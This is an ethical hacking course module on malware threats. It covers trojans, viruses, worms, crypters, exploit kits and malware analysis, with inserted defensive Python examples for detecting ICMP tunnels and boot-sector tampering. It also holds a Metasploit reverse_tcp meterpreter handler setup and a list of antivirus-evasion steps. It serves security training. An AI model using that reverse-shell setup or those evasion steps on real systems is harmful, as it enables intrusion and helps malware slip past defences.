Ethical Hacking v10 Module 6 – Malware Threats

Goals
• Understand Malware/Malware Propagation Techniques
• Understand Trojan Types/How They Work
• Understand Virus Types/How They Work
• Understand Computer Worms
• Understand Process of Malware Analysis
• Understand Malware Detection Techniques
• Learn Malware Countermeasures
• Understand Malware Penetration Testing

Module 6.0 Malware Threats
• 6.1 Introduction to Malware
• 6.2 Trojan Concepts
• 6.3 Virus and Worm Concepts
• 6.4 Malware Reverse Engineering
• 6.5 Malware Detection
• 6.6 Countermeasures
• 6.7 Anti-malware Software
• 6.8 Penetration Testing

6.1 Introduction to Malware

Introduction to Malware
• Malicious software that damages or disables computer systems and gives some control to the malware creator, typically for:
  • Theft
  • Fraud
• Examples:
  • Trojan Horse
  • Virus
  • Backdoor
  • Worm
  • Rootkit
  • Spyware, Ransomware, Botnet, Adware, Crypter

How Malware Gets into Systems
• Instant Messenger applications
• IRC (Internet Relay Chat)
• Removable devices
• Attachments
• Legitimate software packaged by a disgruntled employee
• Browser and email software bugs
• NetBIOS (file sharing)
• Fake programs
• Untrusted sites and freeware software
• Downloading files, games, and screensavers from Internet sites

Common Techniques Attackers Use to Distribute Malware on the Web
• Blackhat Search Engine Optimization (SEO)
  • Ranking malware pages highly in search results
• Malvertising
  • Embedding malware in ad networks that appear on hundreds of legitimate sites
• Compromised Legitimate Sites
  • Hosting embedded malware that spreads to visitors
• Social Engineered Click-jacking
  • Tricking users into clicking on innocent-looking pages
• Spearphishing Sites
  • Impersonating legitimate organizations in an attempt to steal login credentials
• Drive-by Downloads
  • Exploiting flaws in browser software to install malware just by visiting a web page

6.2 Trojan Concepts

How Hackers Use Trojans
• Delete or replace the operating system's critical files
• Generate DoS attacks
• Record screenshots, audio, and video of the target computer
• Use the target computer for spamming and blasting email messages
• Download spyware, adware, and malicious files
• Disable firewalls and antivirus software
• Create backdoors for remote access
• Use the target computer as a proxy server for relay attacks
• Use the target computer as part of a botnet to generate DDoS attacks
• Steal information, including passwords, security codes, and credit card information, using keyloggers

Common Ports Used by Trojans

TCP Port   Name of Trojan
21         Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
23         Tiny Telnet Server
25         Antigen, Email Password Sender, HaebuCoceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy, Kuang2 0.17A-0.30
31         Hackers Paradise
80         Executor
456        Hackers Paradise
555        Ini-Killer, Phase Zero, Stealth Spy
666        Satanz Backdoor
1001       Silencer, WebEx
1011       Doly Trojan
1170       Psyber Stream Server, Voice
1234       Ultors Trojan
1243       SubSeven 1.0 – 1.8
1245       VooDoo Doll
1492       FTP99CMP
1600       Shivka-Burka
1807       SpySender
1981       Shockrave
1999       BackDoor 1.00-1.03
2001       Trojan Cow
2023       Ripper
2115       Bugs
2140       Deep Throat, The Invasor
2801       Phineas Phucker
3024       WinCrash
3129       Masters Paradise
3150       Deep Throat, The Invasor
3700       Portal of Doom
4092       WinCrash
4567       File Nail 1
4590       ICQTrojan
5000       Bubbel
5001       Sockets de Troie
5321       Firehotcker
5400       Blade Runner, Blade Runner 0.80 Alpha
5401       Blade Runner, Blade Runner 0.80 Alpha
5402       Blade Runner, Blade Runner 0.80 Alpha
5569       Robo-Hack
5742       WinCrash
6670       DeepThroat
6771       DeepThroat
6969       GateCrasher, Priority
7000       Remote Grab
7300       NetMonitor
7301       NetMonitor
7306       NetMonitor
7307       NetMonitor
7308       NetMonitor
7789       ICKiller
8787       Back Orifice 2000
9872       Portal of Doom
9873       Portal of Doom
9874       Portal of Doom
9875       Portal of Doom
9989       iNi-Killer
10067      Portal of Doom
10167      Portal of Doom
10607      Coma 1.0.9
11000      Senna Spy
11223      Progenic trojan
12223      Hack´99 KeyLogger
12345      GabanBus, NetBus
12346      GabanBus, NetBus
12361      Whack-a-mole
12362      Whack-a-mole
16969      Priority
20001      Millennium
20034      NetBus 2.0, Beta-NetBus 2.01
21544      GirlFriend 1.0, Beta-1.35
22222      Prosiak
23456      Evil FTP, Ugly FTP
26274      Delta
30100      NetSphere 1.27a
30101      NetSphere 1.27a
30102      NetSphere 1.27a
31337      Back Orifice
31338      Back Orifice, DeepBO
31339      NetSpy DK
31666      BOWhack
33333      Prosiak
34324      BigGluck, TN
40412      The Spy
40421      Masters Paradise
40422      Masters Paradise
40423      Masters Paradise
40426      Masters Paradise
47262      Delta
50505      Sockets de Troie
50766      Fore
53001      Remote Windows Shutdown
54321      SchoolBus .69-1.11
61466      Telecommando
65000      Devil

UDP Port   Name of Trojan
1349       Back Orifice DLL
31337      Back Orifice 1.20
31338      DeepBO
54321      Back Orifice 2000

6.3 Trojan Types

Types of Trojans
• VNC Trojan
• HTTP Trojan
• ICMP Trojan
• Data Hiding Trojan
• Destructive Trojan
• HTTPS Trojan
• Botnet Trojan
• Proxy Server Trojan
• Remote Access Trojan
• FTP Trojan
• Defacement Trojan
• E-banking Trojan
• Covert Channel Trojan
• Notification Trojan
• Mobile Trojan
• Command Shell Trojan

Command Shell Trojans
• A command shell Trojan gives remote control of the command shell on a target computer
• The Trojan server is installed on the target computer and opens a port for the attacker to connect to
• A client is installed on the attacker's computer and is used to launch a command shell on the target computer

Defacement Trojans
• Resource editors allow an attacker to view, edit, extract, and replace strings, bitmaps, logos, and icons in any Windows program
• They allow viewing and editing of almost any aspect of a compiled Windows program, including menus, dialog boxes, icons, etc.
• A User-styled Custom Application (UCA) is applied to deface Windows applications

Botnet Trojans
• Botnet Trojans infect a large number of target computers across a large geographic area to create a network of bots that are controlled through a command and control (C&C) center
• Botnets are used to launch attacks on targets, including DoS, spamming, click fraud, and financial information theft

Botnet Trojans (cont'd)
• Tor-based Botnet Trojans – ChewBacca
  • The ChewBacca Trojan has stolen data on 49,000 payment cards from 45 retailers in 11 countries over a two-month span
• Botnet Trojans – Skynet and CyberGate
  • Skynet – a Tor-powered Trojan with DDoS, Bitcoin mining and banking capabilities, spread through Usenet
  • CyberGate RAT – a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously being developed by an experienced team
  • CyberGate RAT was built as a tool for various possible applications, ranging from assisting users with routine maintenance tasks to remotely monitoring children, capturing regular user activity and automatically maintaining a backup of typed data

Proxy Server Trojans
• A Trojan proxy is usually a standalone application that allows a remote attacker to use the target computer as a proxy to connect to the Internet
• The Proxy Server Trojan starts a hidden proxy server on the target computer
• Thousands of computers on the Internet are infected with proxy servers using this technique

W3bPrOxy Tr0j4nCr34t0r (Funny Name)
• W3bPrOxy Tr0j4nCr34t0r is a proxy server Trojan
• Supports multiple connections from many clients
• Reports IP addresses and ports by email to the Trojan owner

FTP Trojans
• FTP Trojans install an FTP server on the target computer that opens FTP ports
• An attacker can then connect to the target computer over the FTP port to download any files that exist on the target computer

VNC Trojans
• A VNC Trojan starts a VNC server daemon on the target system
• The attacker connects to the target using any VNC viewer
• VNC is considered a utility, which makes a VNC Trojan difficult to detect
• Hesperbot
  • Hesperbot is a banking Trojan which features common functionality, including keystroke logging, creation of screenshots and video capture, and configuring remote proxies
  • Creates a hidden VNC server for the attacker to connect to the target remotely
  • VNC does not log the user off like RDP does, therefore the attacker can connect to the target computer while a user is working

HTTP/HTTPS Trojans
• Bypass Firewall
  • HTTP Trojans can bypass firewalls by working in the reverse direction of a straight HTTP tunnel
• Spawn a Child Program
  • Executed on the internal host, the Trojan spawns a child program at a scheduled time
• Access the Internet
  • The child program appears to the firewall to be a user and is allowed to access the Internet

HTTP Trojan – HTTP RAT
• Displays ads, records personal data/keystrokes
• Downloads unsolicited files, disables programs/system
• Floods the Internet connection and distributes threats
• Tracks browsing history and activities and hijacks the browser
• Makes fraudulent claims about spyware detection and removal

SHTTPD Trojan – HTTPS (SSL)
• SHTTPD is a small HTTP server that can be embedded in any program
• Can be wrapped with a legitimate program
• When executed, it transforms the target computer into an invisible web server

ICMP Tunneling
• Covert channels are methods by which an attacker hides data inside a protocol so that it goes undetected
• They rely on techniques called tunneling that allow one protocol to be carried over another protocol
• ICMP tunneling uses ICMP echo request and reply messages to carry a payload and silently access or control a target computer
• Icmpsend
  • Client computer – icmpsend <target IP Address>
  • ICMP server – icmpserv -install
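
Because an ICMP tunnel must carry its data in the echo payload, the payload itself gives it away. The following Python is an added example rather than course material: it parses raw echo messages (IP header already stripped, an assumption) and scores a conversation on payload size, entropy and deviation from the standard Windows and Linux ping patterns; the thresholds and the sample traffic are constructed for illustration.

```python
import math
import struct
from collections import Counter
from dataclasses import dataclass

ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8
# Windows ping sends this fixed 32-byte payload; Linux ping sends a 16-byte
# timestamp followed by bytes whose value equals their offset (0x10, 0x11, ...).
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"
MAX_NORMAL_PAYLOAD = 64   # assumed: default ping payloads are 32 or 56 bytes
ENTROPY_THRESHOLD = 6.0   # assumed: bits/byte; compressed or encrypted data approaches 8


@dataclass
class IcmpEcho:
    type: int
    code: int
    ident: int
    seq: int
    payload: bytes


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over the whole ICMP message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(type_: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Assemble a raw echo message; used here only to construct sample traffic."""
    header = struct.pack("!BBHHH", type_, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", type_, 0, csum, ident, seq) + payload


def parse_echo(raw: bytes) -> IcmpEcho:
    if len(raw) < 8:
        raise ValueError("ICMP message shorter than the 8-byte header")
    type_, code, csum, ident, seq = struct.unpack("!BBHHH", raw[:8])
    if type_ not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY):
        raise ValueError("not an echo request or reply")
    if icmp_checksum(raw[:2] + b"\x00\x00" + raw[4:]) != csum:
        raise ValueError("bad ICMP checksum")
    return IcmpEcho(type_, code, ident, seq, raw[8:])


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_like_standard_ping(payload: bytes) -> bool:
    if payload == WINDOWS_PING_PAYLOAD:
        return True
    # Linux style: everything after the 16-byte timestamp is the offset pattern.
    return len(payload) > 16 and all(b == (i & 0xFF) for i, b in enumerate(payload) if i >= 16)


def suspicious_reasons(pkt: IcmpEcho) -> list:
    """Per-packet heuristics; an empty list means the echo looks like a normal ping."""
    reasons = []
    if len(pkt.payload) > MAX_NORMAL_PAYLOAD:
        reasons.append("oversized payload (%d bytes)" % len(pkt.payload))
    if shannon_entropy(pkt.payload) > ENTROPY_THRESHOLD:
        reasons.append("high-entropy payload")
    if not looks_like_standard_ping(pkt.payload):
        reasons.append("payload is not a standard ping pattern")
    return reasons


def analyze_session(raw_packets) -> dict:
    """Score a whole echo conversation. A tunnel is suspected when at least half of
    the packets trip two or more heuristics, so one odd packet does not alert."""
    pkts = [parse_echo(r) for r in raw_packets]
    flagged = sum(1 for p in pkts if len(suspicious_reasons(p)) >= 2)
    return {"total": len(pkts), "flagged": flagged,
            "tunnel_suspected": bool(pkts) and flagged * 2 >= len(pkts)}


# Constructed sample traffic (not a capture): three Windows-style pings, and three
# echo requests each carrying 96 bytes of different high-entropy data.
NORMAL_SESSION = [build_echo(ICMP_ECHO_REQUEST, 0x1234, s, WINDOWS_PING_PAYLOAD)
                  for s in range(3)]
TUNNEL_SESSION = [build_echo(ICMP_ECHO_REQUEST, 0x1234, s,
                             bytes((i * 37 + 11 + s) & 0xFF for i in range(96)))
                  for s in range(3)]

if __name__ == "__main__":
    for name, session in (("normal", NORMAL_SESSION), ("tunnel", TUNNEL_SESSION)):
        print(name, analyze_session(session))
```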

ICMP Tunneling Example

Remote Access Trojans
• Work like remote desktop access
• The attacker gains complete graphical user interface (GUI) access to the target computer remotely
• Install
  • Infect the target computer with server.exe
  • Plant a reverse-connecting Trojan
  • The Trojan connects to port 80 to establish the reverse connection
  • The attacker has complete control over the target computer

Remote Access Trojans (cont'd)
• Optix Pro
• MoSucker
• BlackHole RAT
• SSH-R.A.T.
• njRAT
• Xtreme RAT
• DarkComet RAT
• Pandora RAT
• HellSpy RAT
• ProRAT
• Theef

Remote Access Tools – Atelier Web Remote Commander
• Allows a remote connection to be established to a remote computer
• Doesn't install any client or supporting software on that computer

Hell Raiser RAT
• HellRaiser allows an attacker to gain access to the target computer
• Send pictures, pop up chat messages, and transfer files to and from the target system
• Completely monitor the operations performed on the target computer

Covert Channel Trojan – CCTT
• The Covert Channel Tunneling Tool (CCTT) Trojan is equipped with a number of exploitation techniques for creating arbitrary data transfer channels in the data streams authorized by a network access control system
• Enables attackers to get an external server shell from within the internal network, and from internal to external as well
• Sets up a TCP/UDP/HTTP CONNECT|POST channel permitting TCP data streams (SSH, SMTP, POP, etc.) between an external server and a device that resides on the internal network

E-banking Trojans
• Intercept a target's banking account information before it is encrypted
• Send it to the attacker's Trojan command and control center
• Steal the target's data, including credit card information
• Transmit it to remote hackers using email, FTP, IRC, and other methods

Types of E-banking Trojans
• TAN Grabber
  • The Trojan intercepts a valid Transaction Authentication Number (TAN) entered by the user
  • Replaces the TAN with a random number that will be rejected by the bank
  • The attacker can use the intercepted TAN with the user's login details
• HTML Injection
  • The Trojan creates fake form fields on e-banking pages
  • The fields elicit extra information (card number, date of birth, etc.)
  • The attacker can use it to impersonate the target and compromise the account
• Form Grabber
  • The Trojan analyses POST requests and responses to the target's browser
  • Compromises scramble pad authentication
  • Intercepts scramble pad input as the user enters the Customer Number and Personal Access Code

E-banking Trojans – ZeuS and SpyEye
• The main purpose of ZeuS and SpyEye is to steal bank and credit card account information, FTP data, and other sensitive information from infected computers using web browsers and protected storage
• SpyEye can automatically and quickly initiate online transactions
• Additional e-banking Trojans include Citadel Builder and Ice IX

Destructive Trojans – M4sT3r Trojan
• M4sT3r is a very dangerous and destructive Trojan
• When executed, it destroys the operating system
• Formats all local and network drives
• The user will no longer be able to boot the computer

Notification Trojans
• Notification Trojans send the target's IP address to the attacker
• Whenever the target computer connects to the Internet, the attacker receives a notification

Data Hiding Trojans (Encrypted Trojans)
• Encryption Trojans encrypt data files on the target's system and render the information unusable
• Written in C++
• Attackers demand a ransom or force the targets to make purchases from their online drug stores to unlock the files
• Targets include
  • Company databases
  • Personal information
  • Vital files and folders
  • Financial information
  • Confidential documents and information

6.4 Trojan Tools

How to Infect Systems Using a Trojan
• Create a new Trojan packet using a Trojan Horse Construction Kit
• Create a dropper, which is the part of a trojanized packet that installs the malicious code on the target computer
• Create a wrapper using wrapper tools to install the Trojan on the target computer
• Propagate the Trojan
• Execute the dropper
• Execute the damaging program/routine
• Major Trojan Attack Paths
  • User clicks on the malicious link
  • User opens malicious email attachments

Wrappers
• A wrapper binds a Trojan executable with an .exe application that appears to be a game or office application
• The two programs are wrapped together into a single file
• When the user runs the wrapped .exe
  • It installs the Trojan in the background
  • Then runs the wrapping application in the foreground

Dark Horse Trojan Virus Maker

Crypters
• Software used by hackers to hide viruses, keyloggers, or tools inside any file to avoid detection by antivirus products
• Can encrypt, obfuscate, and manipulate malware
• Makes it harder to detect by security programs
• Used by cybercriminals to create malware that can bypass security programs
• Presents itself as a harmless program until it gets installed

Types of Crypters
• Static/statistical crypters
  • Use different stubs to make each encrypted file unique
  • Having a separate stub for each client makes it easier for malicious actors to modify or, in hacking terms, "clean" a stub once it has been detected by security software
• Polymorphic crypters
  • Considered more advanced
  • Use state-of-the-art algorithms that utilize random variables, data, keys, decoders, and so on
  • One input source file never produces an output file that is identical to the output of another source file
• Crypter services are available online for a reasonable fee ($10 - 100)

Crypter Examples
• Msfvenom
• AIO FUD Crypter
• Hidden Sight Crypter
• Galaxy Cryptor
• Criogenic Crypter
• Heaven Crypter
• SwayzCryptor
• Aegis Crypter

Creating a Malicious Payload Using MSFVENOM

Exploit Kit
• An exploit kit or crimeware toolkit is a platform to deliver exploits and payloads
• Delivers Trojans, spyware, backdoors, bots, buffer overflow scripts, etc. to the target

Creating a Malicious Payload in Metasploit

Set Up Your Exploit Multi Handler

  use exploit/multi/handler
  set PAYLOAD windows/x64/meterpreter/reverse_tcp
  set LHOST <kali IP>
  set LPORT 4444
  show options
  run

Infinity
• The Infinity Exploit Kit is an exploit kit that uses vulnerabilities in Mozilla Firefox, Internet Explorer and Opera to install threats on target computers
• Malware analysts have also reported that the Infinity Exploit Kit exploits known vulnerabilities in web browser add-ons and platforms like Java and Adobe Flash to carry out its attacks
• The Infinity Exploit Kit is used to compromise target computers and may be associated with other threats
• The Infinity Exploit Kit will find and use any vulnerability to install threats on the PC

Other Exploit Kits
• Phoenix Exploit Kit
  • The Phoenix Exploit Kit is a commercial crimeware tool that until fairly recently was sold by its maker in the underground for a base price of $2,200
  • It is designed to booby-trap hacked and malicious web sites so that they impose drive-by downloads on visitors
  • Phoenix targets only Microsoft Windows computers
• Blackhole Exploit Kit
  • Blackhole is commercial crimeware designed to be stitched into hacked or malicious sites and exploit a variety of web browser vulnerabilities for the purpose of installing malware of the customer's choosing
  • Once an extremely popular crimeware-as-a-service offering, Blackhole was for several years responsible for malware infections and stolen banking credentials, and likely contributed to tens of millions of dollars stolen from small to mid-sized businesses

Other Exploit Kits (cont'd)
• Bleeding Life
  • Exploit pack run on Java Juice
  • What's interesting about this kit is that its authors advertise that one of the exploits included isn't really an exploit at all: it's a social engineering attack where the hacked page simply abuses built-in Java functionality to ask the visitor to run a malicious Java applet
• Crimepack
  • A prepackaged bundle of commercial crimeware that attackers can use to booby-trap hacked web sites with malicious software
  • Another Java exploit software

Evading Antivirus Techniques
• Break the Trojan file into multiple pieces and zip them into a single file
• Always write the Trojan and embed it in an application
• Change the Trojan's syntax
• Convert the .exe to a VB script
• Change the .exe extension to .doc.exe, .ppt.exe, .pdf.exe, as Windows hides file extensions by default
• Change the content of the Trojan using a hex editor, and also change the checksum and encrypt the file
• Never use Trojans downloaded from the web, as antiviruses can detect these with no trouble

6.5 Virus and Worm Concepts

Introduction to Viruses
• A virus is a self-replicating program that produces its own copy by attaching itself to another program, computer boot sector, or document
• Viruses are usually transmitted through file downloads, infected removable disk drives, flash drives, and email attachments
• Virus characteristics
  • Infects other programs
  • Alters data
  • Transforms itself
  • Corrupts files and programs
  • Encrypts itself
  • Self-replicates

The Life of a Virus
• Design – a virus is developed using programming code or construction kits
• Replication – viruses replicate for an amount of time and then spread
• Launch – the virus is activated by the user
• Detection – the virus is then detected by antivirus software
• Incorporation – antivirus software continuously updates its software to automatically eradicate the virus
• Elimination – the threat of that virus is eliminated when users keep their antivirus software up to date

Working of Viruses
• Infection Phase
  • The virus replicates itself and attaches to an .exe file in the system
• Attack Phase
  • Viruses are programmed with trigger events to activate and corrupt systems
  • Viruses may infect each time they are run
  • Viruses may run only when predefined conditions occur
  • Viruses may run on specific days, dates, times, or events

Reasoning Behind Creating Viruses
• Cause damage to an individual or organization
• Receive financial benefits
• Use for research projects
• Play a trick
• Cause vandalism
• Perpetrate cyber terrorism
• Distribute ideological messages (political, religious, etc.)

Indications of a Virus Attack
• Abnormal Activities – the system acts in an unusual and unexpected way
  • Processes take more time to complete
  • Computer is unresponsive
  • Drive labels change
  • Unable to boot the operating system
  • Computer slows down when running normal applications
• False Positives – many glitches can result from viruses, but not all
  • Many antivirus alerts
  • Computer freezes periodically
  • Files and folders are missing
  • Hard drive accesses increase
  • Browser window freezes frequently

How Do Computers Become Infected
• Users download or run files from untrusted sources
• Users open infected email attachments
• Users install pirated and untrusted applications
• Users do not keep operating system applications updated regularly
• Users do not install new versions of plug-ins when directed
• Users do not keep antivirus applications up to date

6.6 Virus Types

Ransomware
• Ransomware is a type of malware that restricts access to a target computer's files and folders and demands an online ransom payment to the malware creators
• Types
  • Cryptorbit Ransomware
  • CryptoLocker Ransomware
  • CryptoDefense Ransomware
  • CryptoWall Ransomware
  • Police-themed Ransomware

Types of Viruses
• System or Boot Sector
• File
• Cluster
• Multipartite
• Macro
• Stealth/Tunneling
• Encryption
• Sparse Infector
• Add-on
• Polymorphic
• Companion/Camouflage
• Intrusive
• Metamorphic
• Shell
• Direct Action or Transient
• Overwriting File
• File Extension
• Terminate and Stay Resident (TSR)

System or Boot Sector Viruses
• A boot sector virus moves the MBR to another location on the hard disk and copies itself to the original location of the MBR
• When the affected system boots, the virus code is executed first and then control is passed to the original MBR
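
The relocation described above leaves two artefacts a defender can check for: the boot code in sector 0 no longer matches its recorded baseline, and the original MBR sits somewhere in the gap before the first partition. The Python below is an added example, not course material; the sector contents are constructed stand-ins, the baseline is taken from the clean sector, and the gap sectors are passed in as a dict rather than read from a disk.

```python
import hashlib
import struct

SECTOR_SIZE = 512
CODE_SIZE = 446                  # boot code occupies bytes 0-445
PARTITION_TABLE = 446            # four 16-byte entries follow the code
BOOT_SIGNATURE = b"\x55\xaa"     # bytes 510-511 of every valid MBR


def parse_mbr(sector: bytes) -> dict:
    """Split an MBR into a hash of its boot code and its partition entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("MBR must be exactly one 512-byte sector")
    if sector[510:] != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for i in range(4):
        status, ptype, lba_start, sectors = struct.unpack_from(
            "<B3xB3xII", sector, PARTITION_TABLE + 16 * i)
        if ptype == 0:                       # empty slot
            continue
        if status not in (0x00, 0x80):
            raise ValueError("partition %d has invalid status byte 0x%02x" % (i, status))
        partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                           "lba_start": lba_start, "sectors": sectors})
    return {"code_sha256": hashlib.sha256(sector[:CODE_SIZE]).hexdigest(),
            "partitions": partitions}


def compare_to_baseline(current: bytes, baseline: dict) -> list:
    """Findings that distinguish the MBR read now from the recorded known-good one."""
    cur = parse_mbr(current)
    findings = []
    if cur["code_sha256"] != baseline["code_sha256"]:
        findings.append("boot code differs from baseline")
    if cur["partitions"] != baseline["partitions"]:
        findings.append("partition table differs from baseline")
    if sum(p["bootable"] for p in cur["partitions"]) != 1:
        findings.append("expected exactly one bootable partition")
    return findings


def find_relocated_mbr(gap_sectors: dict, baseline: dict) -> list:
    """A boot sector infector parks the original MBR elsewhere (typically in the
    unused sectors before the first partition) and chains to it after running.
    Return the LBAs whose sector carries a boot signature and the baseline's code."""
    return sorted(lba for lba, data in gap_sectors.items()
                  if len(data) == SECTOR_SIZE and data[510:] == BOOT_SIGNATURE
                  and hashlib.sha256(data[:CODE_SIZE]).hexdigest() == baseline["code_sha256"])


def _entry(status, ptype, lba_start, sectors):
    return struct.pack("<B3xB3xII", status, ptype, lba_start, sectors)


# Constructed sample sectors (not from a real disk). The clean MBR holds a stand-in
# loader prologue padded with NOPs; the "infected" one has different code in front of
# the same partition table, and the clean copy has been parked at LBA 7 in the gap.
PARTITIONS = _entry(0x80, 0x07, 2048, 204800) + _entry(0x00, 0x83, 206848, 409600) + bytes(32)
CLEAN_MBR = b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * (CODE_SIZE - 8) + PARTITIONS + BOOT_SIGNATURE
INFECTED_MBR = b"\xeb\x3c\x90" + b"\xcc" * (CODE_SIZE - 3) + PARTITIONS + BOOT_SIGNATURE
GAP_SECTORS = {1: bytes(SECTOR_SIZE), 7: CLEAN_MBR, 12: bytes(SECTOR_SIZE)}
BASELINE = parse_mbr(CLEAN_MBR)

if __name__ == "__main__":
    print(compare_to_baseline(CLEAN_MBR, BASELINE))      # []
    print(compare_to_baseline(INFECTED_MBR, BASELINE))   # ['boot code differs from baseline']
    print(find_relocated_mbr(GAP_SECTORS, BASELINE))     # [7]
```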

File and Multipartite Viruses
• File Viruses
  • Infect files which are executed or interpreted in the system, including .exe, .sys, .com, .prg, .bat, .mnu, .obj, etc.
  • Can be either direct-action (non-resident) or memory-resident
• Multipartite Viruses
  • Infect the system boot sector and executable files at the same time

Macro Viruses
• Infect files created by Microsoft Word or Excel
• Most are written using Visual Basic for Applications (VBA)
• Infect templates or convert infected documents into template files, while appearing normal

Cluster Viruses
• Modify directory table entries so that they point users or system processes to the virus code rather than the actual application
• Only one copy of the virus is stored on disk, but it infects all applications on the computer
• The virus launches itself first when any application on the computer is started, after which control is passed to the actual application

Stealth/Tunneling Viruses
• Evade antivirus software by intercepting its requests to the operating system
• The virus hides by intercepting the antivirus software's request to read the file and handling the request itself instead of passing it to the operating system
• The virus then returns an uninfected version of the file to the antivirus software, which makes the file appear clean

Encryption Viruses
• Use simple encryption to encipher the code
• The virus is encrypted with a different key for each infected file
• Antivirus software cannot directly detect them using signature detection methods

Polymorphic Code
• Mutates while keeping the original algorithm intact
• To enable this, the virus must have a polymorphic engine (mutating engine)
• When well-written, no parts remain the same on each infection

Metamorphic Viruses
• Rewrite themselves completely every time they infect a new executable
• Metamorphic code can reprogram itself by translating its own code into a temporary representation and then back to normal code

File Overwriting or Cavity Viruses
• A cavity virus overwrites a part of the host file that holds a constant (usually nulls), without increasing the length of the file and while preserving its functionality

Sparse Infector Viruses
• Infect only occasionally, not every application that is executed
• Infect only files that are a certain size
• This helps the virus avoid detection

Companion/Camouflage Viruses
• A computer virus that stores itself in a file named similarly to another program file that is commonly executed
• When that file is executed, the virus infects the computer or performs malicious steps such as deleting the files on the user's hard drive

Shell Viruses
• Infect a computer by wrapping themselves around code which already exists, such as the operating system code which writes to a file
• Whenever a program tries to use the enclosed code, the virus code is executed

File Extension Viruses
• Change the extensions of files
• .txt is safe as it indicates a pure text file
• With file extension display turned off, a file may appear to be safe when it is not
  • Example: Files.txt could really be File.txt.vbs
• Turn off "hide file extensions" in the operating system

Add-on and Intrusive Viruses
• Add-on viruses
  • Append their code to the host code without making any changes to the host code
  • Insert code at the beginning of the valid code
• Intrusive viruses
  • Overwrite the host code partly or completely with the viral code

Transient and Terminate-and-Stay-Resident Viruses
• Transient
  • Disappears after running
• TSR
  • Loads itself into memory and stays there

Virus Hoaxes and Fake Antiviruses
• Virus Hoaxes
  • Hoaxes are false alarms claiming reports about a non-existent virus, and may themselves carry virus attachments
  • A fake warning message propagates to users telling them not to open a specific email that will damage their system
• Fake Antiviruses
  • Attackers disguise malware as an antivirus and trick users into installing it on their system
  • Fake antiviruses damage target systems and can be considered malware

Computer Worms
• Malicious programs that operate across network connections without the need for human involvement
• Most worms replicate and spread across the network to consume resources
• Some worms carry a damaging payload
• Worm payloads are often used to install backdoors, turning infected computers into zombies and creating botnets

Differences between Viruses and Worms
• Worms self-replicate without human involvement, viruses don't
• Worms cannot attach themselves to other programs
• Worms use file/information transport features to spread through infected networks automatically, viruses don't
• Type of worm – Ghost Eye Worm
• Worm maker – Internet Worm Maker Thing

6.7 Malware Analysis


Sheep Dip Computer
• Sheep dipping is an analysis of incoming messages/files for malware
• Sheep dip computers have port, file, and network monitors and anti-virus software
• Sheep dip computers have a strictly controlled connection to the network


Antivirus Sensor System
• Computer software that identifies/analyzes malicious code threats
• Used in conjunction with sheep dip computers


Malware Analysis
• Preparing the test bed by:
  • Isolating the system
  • Disabling shared folders/guest isolation
  • Copying the malware to the guest O/S


Malware Analysis
1. Perform static analysis while the malware is inactive
2. Collect information concerning:
  • String values found in the binary
  • Packaging/compressing technique
3. Set up the network connection and ensure there are no errors
4. Run the virus and monitor process actions/system information
5. Record network traffic information
6. Determine which files have been added, which processes have been spawned, and which registry changes have been made
7. Collect information on service requests, DNS information, and incoming/outgoing connection attempts
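Steps 1 and 2 above (strings and packing technique) in working form, as an added example rather than course material: it pulls printable strings the way strings(1) does and uses byte entropy as the packer heuristic. Both sample buffers are constructed stand-ins, not real binaries, and the check-in URL is a made-up indicator.

```python
import math
import random
import re

# Constructed sample "binaries" for this example (not real malware).
# PLAIN_SAMPLE mimics an unpacked PE body: readable import names and a
# hard-coded check-in URL. PACKED_SAMPLE stands in for a packed or
# encrypted body: a small stub followed by near-random bytes.
PLAIN_SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 60
    + b"This program cannot be run in DOS mode.\r\n"
    + b"kernel32.dll\x00CreateFileA\x00WriteFile\x00"
    + b"http://c2.example.invalid/checkin\x00"   # constructed indicator
    + b"\x00" * 200
)
_rng = random.Random(7)                         # fixed seed: reproducible
PACKED_SAMPLE = b"MZ\x90\x00" + bytes(_rng.getrandbits(8) for _ in range(4096))


def extract_strings(data: bytes, min_len: int = 6) -> list:
    """Printable ASCII runs of at least min_len bytes, as strings(1) reports."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.decode("ascii") for m in pattern.findall(data)]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_packed(data: bytes, threshold: float = 7.0) -> bool:
    """Packer-identifier heuristic: compressed or encrypted bodies sit near
    8 bits/byte, ordinary x86 code and data tables around 5 to 6.5."""
    return shannon_entropy(data) >= threshold


def triage(data: bytes) -> dict:
    """What a first static pass records: entropy, packing verdict, strings, URLs."""
    strings = extract_strings(data)
    return {
        "entropy": round(shannon_entropy(data), 2),
        "packed": looks_packed(data),
        "string_count": len(strings),
        "urls": [s for s in strings if s.startswith(("http://", "https://"))],
    }
```

A high-entropy verdict with almost no strings is the cue to unpack first (the slide's step 2) before spending time in a disassembler.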


Online Malware Analysis Services
• Anubis: Analyzing Unknown Binaries
• Avast! Online Scanner
• Malware Protection Center
• ThreatExpert
• Dr. Web Online Scanners
• Metascan Online
• Bitdefender QuickScan
• UploadMalware.com
• Online Malware Scanner
• ThreatAnalyzer
• VirusTotal


Various Analysis Services
